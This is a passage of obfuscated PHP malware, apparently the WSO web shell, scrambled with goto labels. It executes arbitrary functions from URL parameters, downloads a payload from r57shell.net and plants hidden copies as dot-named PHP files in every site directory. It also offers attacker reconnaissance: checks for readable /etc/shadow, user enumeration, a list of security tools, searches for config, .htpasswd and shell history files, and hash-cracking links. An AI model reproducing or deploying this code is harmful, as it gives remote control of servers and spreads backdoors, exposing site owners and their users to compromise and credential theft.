@$_GET["m"] . "gagal.php";
goto ZI_cL;
svCvU:
}
goto pHtWV;
kgaYa:
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
goto FBXXk;
fi0K3:
}
goto d_oge;
d_oge:
exit();
goto fDMzx;
fDMzx:
}
goto gHtz2;
fqAaN:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto SO8pY;
SO8pY:
foreach ($dirs as $d) {
goto Scp89;
cQFnr:
@file_put_contents($file_name, $response);
goto cQiiG;
Scp89:
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
goto cQFnr;
IlPtg:
foreach ($dirs as $d) {
if (
!@preg_match(
"#wp-content#",
$d
)
) {
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
@file_put_contents($file_name, $response);
}
}
goto u66S4;
cQiiG:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto IlPtg;
u66S4:
}
goto Q6DRk;
bu9lX:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto toU7p;
gHtz2:
if (!file_exists($tmp_file)) {
goto f_kq1;
QKlrR:
@file_put_contents($tmp_file, $response);
goto Ul3cm;
f_kq1:
if (function_exists("curl_init")) {
goto A1VWF;
J1jm0:
curl_close($ch);
goto p2Bti;
dYLi3:
$response = curl_exec($ch);
goto J1jm0;
sjN5S:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto nQ3kj;
A1VWF:
$ch = curl_init();
goto LvoXB;
LvoXB:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto sjN5S;
nQ3kj:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"]
);
goto dYLi3;
p2Bti:
} else {
goto aeiKy;
aeiKy:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"];
goto XFWPB;
Qt92G:
$context = stream_context_create($opts);
goto mtDkU;
XFWPB:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto Qt92G;
mtDkU:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto jDy5x;
jDy5x:
}
goto NFiUK;
NFiUK:
@touch($tmp_file);
goto QKlrR;
Ul3cm:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
goto KzbMt;
HV6vx:
@touch($tmp_file);
goto pdkVa;
KzbMt:
if (function_exists("curl_init")) {
goto eMsto;
LO0re:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
]
);
goto k5X0p;
HJ7kx:
curl_close($ch);
goto gjzj0;
j4CQT:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto LO0re;
CssGj:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto j4CQT;
k5X0p:
$response = curl_exec($ch);
goto HJ7kx;
eMsto:
$ch = curl_init();
goto CssGj;
gjzj0:
} else {
goto GK4cX;
a3V7j:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}\xd\xa",
],
],
];
goto v8ndl;
GK4cX:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
];
goto a3V7j;
rOcio:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto nx629;
v8ndl:
$context = stream_context_create($opts);
goto rOcio;
nx629:
}
goto HV6vx;
pdkVa:
@file_put_contents($tmp_file, $response);
goto mecCz;
mecCz:
}
}
goto fqAaN;
avUWa:
$document_file =
$_SERVER[
"SCRIPT_FILENAME"
];
goto tIPJm;
CD9KV:
$parse_url = parse_url($request_uri);
goto vOWZG;
tIPJm:
$request_uri = $_SERVER["REQUEST_URI"];
goto CD9KV;
s730R:
$file_path = dirname($document_file);
goto rs5dk;
Q6DRk:
}
wp_core_version_check();
}
goto SG2I5;
cUzsD:
if ($os == "win") {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
goto qljle;
oE6Ue:
$home_cwd = @getcwd();
goto qZOco;
eRZM6:
function wsoPermsColor($f)
{
if (!@is_readable($f)) {
return "<font color=#FF0000>" .
wsoPerms(@fileperms($f)) .
"</font>";
} elseif (!@is_writable($f)) {
return "<font color=white>" .
wsoPerms(@fileperms($f)) .
"</font>";
} else {
return "<font color=#25ff00>" .
wsoPerms(@fileperms($f)) .
"</font>";
}
}
goto guAyk;
HhMRL:
function actionSecInfo()
{
goto wqp98;
qT_UQ:
wsoSecParam(
"cURL support",
function_exists("curl_version")
? "enabled"
: "no"
);
goto zEzgM;
oKr71:
if (function_exists("pg_connect")) {
$temp[] = "PostgreSQL";
}
goto owg70;
giF29:
wsoSecParam(
"Safe mode exec dir",
@ini_get(
"safe_mode_exec_dir"
)
);
goto V6Pow;
o51U2:
wsoSecParam(
"Open base dir",
@ini_get("open_basedir")
);
goto giF29;
m3Zin:
wsoSecParam(
"Disabled PHP Functions",
$GLOBALS[
"disable_functions"
]
? $GLOBALS[
"disable_functions"
]
: "none"
);
goto o51U2;
owg70:
if (function_exists("oci_connect")) {
$temp[] = "Oracle";
}
goto DQ0Hi;
I0L0t:
if (
function_exists(
"mysql_get_client_info"
)
) {
$temp[] =
"MySql (" . mysqli_get_client_info() . ")";
}
goto T3sY7;
T3sY7:
if (
function_exists("mssql_connect")
) {
$temp[] = "MSSQL";
}
goto oKr71;
Kcf2h:
echo "<h1>Server security information</h1><div class=content>";
goto deosI;
GSa9X:
echo "<br>";
goto Ppg7_;
zA3JJ:
wsoSecParam(
"Server software",
@getenv("SERVER_SOFTWARE")
);
goto aO8HS;
IbU7m:
echo "</div>";
goto XTIFZ;
XTIFZ:
wsoFooter();
goto jAziO;
V6Pow:
wsoSecParam(
"Safe mode include dir",
@ini_get(
"safe_mode_include_dir"
)
);
goto qT_UQ;
zEzgM:
$temp = [];
goto I0L0t;
DQ0Hi:
wsoSecParam(
"Supported databases",
implode(", ", $temp)
);
goto GSa9X;
Ppg7_:
if ($GLOBALS["os"] == "nix") {
goto yzksH;
Pr2du:
if (!$GLOBALS["safe_mode"]) {
goto tBdFD;
b1GnC:
wsoSecParam(
"Userful",
implode(", ", $temp)
);
goto gsw3Q;
IArV4:
$temp = [];
goto bo6ds;
SphFn:
wsoSecParam(
"Hosts",
@file_get_contents("/etc/hosts")
);
goto dOgcI;
bo6ds:
foreach ($userful as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto b1GnC;
VXdNV:
wsoSecParam("Danger", implode(", ", $temp));
goto xDJbP;
tBdFD:
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
goto j1mm2;
zL0U4:
foreach ($danger as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto VXdNV;
F15O4:
echo "<br/>";
goto vzm5g;
gsw3Q:
$temp = [];
goto zL0U4;
AYbzB:
wsoSecParam(
"Downloaders",
implode(", ", $temp)
);
goto F15O4;
M0R0C:
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
goto nuthD;
dOgcI:
echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>";
goto Fh4yv;
Fh4yv:
if (
isset($_POST["p2"], $_POST["p3"]) &&
is_numeric($_POST["p2"]) &&
is_numeric($_POST["p3"])
) {
goto TMVUA;
Aagop:
wsoSecParam("Users", $temp);
goto H4g4C;
TMVUA:
$temp = "";
goto g4wsK;
yuLqo:
echo "<br/>";
goto Aagop;
g4wsK:
for (
;
$_POST["p2"] <= $_POST["p3"];
$_POST["p2"]++
) {
$uid = @posix_getpwuid($_POST["p2"]);
if ($uid) {
$temp .= join(":", $uid) . "
";
}
}
goto yuLqo;
H4g4C:
}
goto GP22b;
vzm5g:
wsoSecParam(
"HDD space",
wsoEx("df -h")
);
goto SphFn;
j1mm2:
$danger = [
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja",
];
goto M0R0C;
xDJbP:
$temp = [];
goto pSd_M;
pSd_M:
foreach ($downloaders as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto AYbzB;
nuthD:
echo "<br>";
goto IArV4;
GP22b:
}
goto QDcOt;
yzksH:
wsoSecParam(
"Readable /etc/passwd",
@is_readable("/etc/passwd")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>"
: "no"
);
goto ledym;
ESH98:
wsoSecParam(
"OS version",
@file_get_contents(
"/proc/version"
)
);
goto ZLZ7x;
ZLZ7x:
wsoSecParam(
"Distr name",
@file_get_contents(
"/etc/issue.net"
)
);
goto Pr2du;
ledym:
wsoSecParam(
"Readable /etc/shadow",
@is_readable("/etc/shadow")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>"
: "no"
);
goto ESH98;
QDcOt:
} else {
goto NsBCo;
Me9Q1:
wsoSecParam(
"Account Settings",
wsoEx("net accounts")
);
goto RXCoL;
NsBCo:
wsoSecParam(
"OS Version",
wsoEx("ver")
);
goto Me9Q1;
RXCoL:
wsoSecParam(
"User Accounts",
wsoEx("net user")
);
goto DnuxL;
DnuxL:
}
goto IbU7m;
wqp98:
wsoHeader();
goto Kcf2h;
aO8HS:
if (
function_exists(
"apache_get_modules"
)
) {
wsoSecParam(
"Loaded Apache modules",
implode(", ", apache_get_modules())
);
}
goto m3Zin;
deosI:
function wsoSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "<span>" .
$n .
": </span>";
if (strpos($v, "
") === false) {
echo $v . "<br>";
} else {
echo "<pre class=ml1>" .
$v .
"</pre>";
}
}
}
goto zA3JJ;
jAziO:
}
goto oHsYW;
qljle:
if ($cwd[strlen($cwd) - 1] != "/") {
$cwd .= "/";
}
goto j4eIF;
g7ZCc:
@ini_set("log_errors", 0);
goto ABTpd;
XeOpc:
if (
!function_exists(
"posix_getpwuid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getpwuid"
) === false
) {
function posix_getpwuid($p)
{
return false;
}
}
goto lUvYe;
KC9ar:
function actionStringTools()
{
goto MBvsT;
S0req:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto nYBgB;
Oymko:
if (!function_exists("hex2ascii")) {
function hex2ascii($p)
{
goto uM0Pu;
NG1dD:
return $r;
goto fKGDN;
uM0Pu:
$r = "";
goto ac1Yo;
ac1Yo:
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
goto NG1dD;
fKGDN:
}
}
goto ZMcUd;
vUNKP:
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST["p1"])
? ""
: htmlspecialchars(@$_POST["p2"])) .
"</textarea></form><pre class='ml1' style='" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px' id='strOutput'>";
goto k5nqW;
ZMcUd:
if (!function_exists("ascii2hex")) {
function ascii2hex($p)
{
goto cdb2T;
O0tgA:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf("%02X", ord($p[$i]));
}
goto JVXpM;
cdb2T:
$r = "";
goto O0tgA;
JVXpM:
return strtoupper($r);
goto I6jbu;
I6jbu:
}
}
goto q2kmv;
HYxD9:
echo "<h1>String conversions</h1><div class=content>";
goto OX44o;
awjDW:
function wsoRecursiveGlob($path)
{
goto TkAHe;
lEFZ5:
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
wsoRecursiveGlob($item);
}
} else {
if (
empty($_POST["p2"]) ||
@strpos(file_get_contents($item), $_POST["p2"]) !==
false
) {
echo "<a href='#' onclick='g("FilesTools",null,"" .
urlencode($item) .
"", "view","")'>" .
htmlspecialchars($item) .
"</a><br>";
}
}
}
}
goto fVCol;
GUM3F:
$paths = @array_unique(
@array_merge(
@glob($path . $_POST["p3"]),
@glob($path . "*", GLOB_ONLYDIR)
)
);
goto lEFZ5;
TkAHe:
if (substr($path, -1) != "/") {
$path .= "/";
}
goto GUM3F;
fVCol:
}
goto qLbIZ;
aUced:
if (!function_exists("binhex")) {
function binhex($p)
{
return dechex(bindec($p));
}
}
goto Oymko;
MBvsT:
if (!function_exists("hex2bin")) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
goto aUced;
q2kmv:
if (
!function_exists(
"full_urlencode"
)
) {
function full_urlencode($p)
{
goto d1_DN;
d1_DN:
$r = "";
goto D3iJl;
YAXHC:
return strtoupper($r);
goto wfgBE;
D3iJl:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= "%" . dechex(ord($p[$i]));
}
goto YAXHC;
wfgBE:
}
}
goto IHtdM;
N3xOi:
if (isset($_POST["ajax"])) {
goto V2x0a;
Wm5Kx:
exit();
goto IafqZ;
x5Jd7:
if (in_array($_POST["p1"], $stringTools)) {
echo $_POST["p1"]($_POST["p2"]);
}
goto vD3zd;
vD3zd:
$temp =
"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"
\xd\x9\'\x0"
) .
"';\xa";
goto NED_K;
V2x0a:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto LTDt0;
LTDt0:
ob_start();
goto x5Jd7;
NED_K:
echo strlen($temp), "
", $temp;
goto Wm5Kx;
IafqZ:
}
goto S0req;
nYBgB:
wsoHeader();
goto HYxD9;
k5nqW:
if (!empty($_POST["p1"])) {
if (in_array($_POST["p1"], $stringTools)) {
echo htmlspecialchars($_POST["p1"]($_POST["p2"]));
}
}
goto jZzWZ;
OX44o:
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
goto BBAR5;
Rfc53:
wsoFooter();
goto JMM51;
uWngZ:
echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa \x9<form method='post' target='_blank' name='hf'>
\xa \x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
<input type='hidden' name='act' value='find'/>
\x9 <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9 <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9 </form></div>";
goto Rfc53;
BBAR5:
foreach ($stringTools as $k => $v) {
echo "<option value='" .
htmlspecialchars($v) .
"'>" .
$k .
"</option>";
}
goto vUNKP;
qLbIZ:
if (@$_POST["p3"]) {
wsoRecursiveGlob($_POST["c"]);
}
goto uWngZ;
jZzWZ:
echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9 <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9 <tr><td>Path:</td><td><input type='text' name='cwd' value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"' style='width:100%'></td></tr>\xd\xa <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9 <tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa \x9 </table></form>";
goto awjDW;
IHtdM:
$stringTools = [
"Base64 encode" =>
"base64_encode",
"Base64 decode" =>
"base64_decode",
"Url encode" =>
"urlencode",
"Url decode" =>
"urldecode",
"Full urlencode" =>
"full_urlencode",
"md5 hash" => "md5",
"sha1 hash" => "sha1",
"crypt" => "crypt",
"CRC32" => "crc32",
"ASCII to HEX" =>
"ascii2hex",
"HEX to ASCII" =>
"hex2ascii",
"HEX to DEC" => "hexdec",
"HEX to BIN" =>
"hex2bin",
"DEC to HEX" => "dechex",
"DEC to BIN" => "decbin",
"BIN to HEX" => "binhex",
"BIN to DEC" =>
"bindec",
"String to lower case" =>
"strtolower",
"String to upper case" =>
"strtoupper",
"Htmlspecialchars" =>
"htmlspecialchars",
"String length" =>
"strlen",
];
goto N3xOi;
JMM51:
}
goto xB4MH;
sO9OV:
$cwd = @getcwd();
goto cUzsD;
SG2I5:
function WSOstripslashes($array)
{
return is_array($array)
? array_map(
"WSOstripslashes",
$array
)
: stripslashes($array);
}
goto M9YJl;
EoPoZ:
if ($os == "win") {
$aliases = [
"List Directory" =>
"dir",
"Find index.php in current dir" =>
"dir /s /w /b index.php",
"Find *config*.php in current dir" =>
"dir /s /w /b *config*.php",
"Show active connections" =>
"netstat -an",
"Show running services" =>
"net start",
"User accounts" =>
"net user",
"Show computers" =>
"net view",
"ARP Table" => "arp -a",
"IP Configuration" =>
"ipconfig /all",
];
} else {
$aliases = [
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" =>
"netstat -an | grep -i listen",
"process status" =>
"ps aux",
"Find" => "",
"find all suid files" =>
"find / -type f -perm -04000 -ls",
"find suid files in current dir" =>
"find . -type f -perm -04000 -ls",
"find all sgid files" =>
"find / -type f -perm -02000 -ls",
"find sgid files in current dir" =>
"find . -type f -perm -02000 -ls",
"find config.inc.php files" =>
"find / -type f -name config.inc.php",
"find config* files" =>
"find / -type f -name "config*"",
"find config* files in current dir" =>
"find . -type f -name "config*"",
"find all writable folders and files" =>
"find / -perm -2 -ls",
"find all writable folders and files in current dir" =>
"find . -perm -2 -ls",
"find all service.pwd files" =>
"find / -type f -name service.pwd",
"find service.pwd files in current dir" =>
"find . -type f -name service.pwd",
"find all .htpasswd files" =>
"find / -type f -name .htpasswd",
"find .htpasswd files in current dir" =>
"find . -type f -name .htpasswd",
"find all .bash_history files" =>
"find / -type f -name .bash_history",
"find .bash_history files in current dir" =>
"find . -type f -name .bash_history",
"find all .fetchmailrc files" =>
"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" =>
"find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" =>
"locate httpd.conf",
"locate vhosts.conf files" =>
"locate vhosts.conf",
"locate proftpd.conf files" =>
"locate proftpd.conf",
"locate psybnc.conf files" =>
"locate psybnc.conf",
"locate my.conf files" =>
"locate my.conf",
"locate admin.php files" =>
"locate admin.php",
"locate cfg.php files" =>
"locate cfg.php",
"locate conf.php files" =>
"locate conf.php",
"locate config.dat files" =>
"locate config.dat",
"locate config.php files" =>
"locate config.php",
"locate config.inc files" =>
"locate config.inc",
"locate config.inc.php" =>
"locate config.inc.php",
"locate config.default.php files" =>
"locate config.default.php",
"locate config* files " =>
"locate config",
"locate .conf files" =>
"locate '.conf'",
"locate .pwd files" =>
"locate '.pwd'",
"locate .sql files" =>
"locate '.sql'",
"locate .htpasswd files" =>
"locate '.htpasswd'",
"locate .bash_history files" =>
"locate '.bash_history'",
"locate .mysql_history files" =>
"locate '.mysql_history'",
"locate .fetchmailrc files" =>
"locate '.fetchmailrc'",
"locate backup files" =>
"locate backup",
"locate dump files" =>
"locate dump",
"locate priv files" =>
"locate priv",
];
}
goto MrsTM;
Cjo7J:
$color = "#df5";
goto LNmAT;
ocXfq:
$_COOKIE = WSOstripslashes($_COOKIE);
goto Qn_9k;
dPSqc:
if (empty($_POST["a"])) {
if (
isset($default_action) &&
function_exists("action" . $default_action)
) {
$_POST["a"] = $default_action;
} else {
$_POST["a"] = "SecInfo";
}
}
goto j2Rfu;
fj9OS:
if ($argc == 3) {
$_POST = unserialize(base64_decode($argv[1]));
$_SERVER = unserialize(base64_decode($argv[2]));
}
goto GFRHq;
MrsTM:
function wsoHeader()
{
goto E9rcc;
FKql5:
echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" .
($GLOBALS["os"] == "win"
? "<br>Drives:"
: "") .
"</span></td>" .
"<td><nobr>" .
substr(@php_uname(), 0, 120) .
" <a href="" .
$explink .
"" target=_blank>[exploit-db.com]</a></nobr><br>" .
$uid .
" ( " .
$user .
" ) <span>Group:</span> " .
$gid .
" ( " .
$group .
" )<br>" .
@phpversion() .
" <span>Safe mode:</span> " .
($GLOBALS["safe_mode"]
? "<font color=red>ON</font>"
: "<font color=green><b>OFF</b></font>") .
" <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " .
date("Y-m-d H:i:s") .
"<br>" .
wsoViewSize($totalSpace) .
" <span>Free:</span> " .
wsoViewSize($freeSpace) .
" (" .
(int) (($freeSpace / $totalSpace) * 100) .
"%)<br>" .
$cwd_links .
" " .
wsoPermsColor($GLOBALS["cwd"]) .
" <a href=# onclick="g('FilesMan','" .
$GLOBALS["home_cwd"] .
"','','','')">[ home ]</a><br>" .
$drives .
"</td>" .
"<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" .
$opt_charsets .
"</optgroup></select><br><span>Server IP:</span><br>" .
@$_SERVER["SERVER_ADDR"] .
"<br><span>Client IP:</span><br>" .
$_SERVER["REMOTE_ADDR"] .
"</nobr></td></tr></table>" .
"<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" .
$menu .
"</tr></table><div style="margin:5">";
goto RzURU;
M4wyI:
$m = [
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Console" => "Console",
"Sql" => "Sql",
"Php" => "Php",
"String tools" =>
"StringTools",
"Bruteforce" =>
"Bruteforce",
"Network" => "Network",
];
goto JIPap;
XR0lk:
$totalSpace = $totalSpace ? $totalSpace : 1;
goto gDdS4;
QoI2U:
$drives = "";
goto dJUUJ;
E9rcc:
if (empty($_POST["charset"])) {
$_POST["charset"] =
$GLOBALS[
"default_charset"
];
}
goto wwJNm;
yWMQp:
$charsets = [
"UTF-8",
"Windows-1251",
"KOI8-R",
"KOI8-U",
"cp866",
];
goto QAzn_;
JIPap:
if (!empty($GLOBALS["auth_pass"])) {
$m["Logout"] = "Logout";
}
goto hedz2;
nmRB7:
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST["charset"] .
"'><title>" .
$_SERVER["HTTP_HOST"] .
" - WSO " .
WSO_VERSION .
"</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa var c_ = '" .
htmlspecialchars($GLOBALS["cwd"]) .
"';\xd\xa var a_ = '" .
htmlspecialchars(@$_POST["a"]) .
"'\xd
var charset_ = '" .
htmlspecialchars(@$_POST["charset"]) .
"';\xd
var p1_ = '" .
(strpos(@$_POST["p1"], "
") !== false
? ""
: htmlspecialchars($_POST["p1"], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST["p2"], "
") !== false
? ""
: htmlspecialchars($_POST["p2"], ENT_QUOTES)) .
"';\xd\xa var p3_ = '" .
(strpos(@$_POST["p3"], "\xa") !== false
? ""
: htmlspecialchars($_POST["p3"], ENT_QUOTES)) .
"';
var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa \x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa \x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9 set(a,c,p1,p2,p3,charset);\xd\xa\x9 d.mf.submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9 \x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" .
addslashes($_SERVER["REQUEST_URI"]) .
"', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
\x9if (window.XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {\xd
req.onreadystatechange = processReqChange;\xd\xa req.open('POST', url, true);
\xa req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req.send(params);\xd
}
\xa }
\xa\x9function processReqChange() {
if( (req.readyState == 4) )
\xa \x9\x9if(req.status == 200) {\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr=reg.exec(req.responseText);\xd
\x9 eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>";
goto yrJci;
HJ09z:
$totalSpace = @disk_total_space($GLOBALS["cwd"]);
goto XR0lk;
mxXoN:
$explink =
"http://exploit-db.com/search/?action=search&filter_description=";
goto CGFSE;
jqLRT:
$menu = "";
goto pyClH;
znu8e:
$kernel = @php_uname("s");
goto mxXoN;
IUSK1:
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .=
"<a href='#' onclick='g("FilesMan","";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "/";
}
$cwd_links .= "")'>" . $path[$i] . "/</a>";
}
goto yWMQp;
QAzn_:
$opt_charsets = "";
goto wJ6Eu;
hedz2:
$m["Self remove"] =
"SelfRemove";
goto jqLRT;
MFEdT:
$n = count($path);
goto IUSK1;
PbU2y:
$path = explode("/", $GLOBALS["cwd"]);
goto MFEdT;
CGFSE:
if (strpos("Linux", $kernel) !== false) {
$explink .= urlencode(
"Linux Kernel " .
substr($release, 0, 6)
);
} else {
$explink .= urlencode($kernel . " " . substr($release, 0, 3));
}
goto oXY47;
yrJci:
$freeSpace = @diskfreespace($GLOBALS["cwd"]);
goto HJ09z;
pyClH:
foreach ($m as $k => $v) {
$menu .=
"<th width="" .
(int) (100 / count($m)) .
"%">[ <a href="#" onclick="g('" .
$v .
"',null,'','','')">" .
$k .
"</a> ]</th>";
}
goto QoI2U;
wJ6Eu:
foreach ($charsets as $item) {
$opt_charsets .=
"<option value="" .
$item .
"" " .
($_POST["charset"] == $item
? "selected"
: "") .
">" .
$item .
"</option>";
}
goto M4wyI;
dJUUJ:
if ($GLOBALS["os"] == "win") {
foreach (range("c", "z") as $drive) {
if (is_dir($drive . ":\")) {
$drives .=
"<a href="#" onclick="g('FilesMan','" .
$drive .
":/')">[ " .
$drive .
" ]</a> ";
}
}
}
goto FKql5;
wwJNm:
global $color;
goto nmRB7;
gDdS4:
$release = @php_uname("r");
goto znu8e;
oXY47:
if (
!function_exists("posix_getegid")
) {
goto VMtJd;
VMtJd:
$user = @get_current_user();
goto RNehq;
RNehq:
$uid = @getmyuid();
goto kWs3Y;
n3X6Y:
$group = "?";
goto dyMHz;
kWs3Y:
$gid = @getmygid();
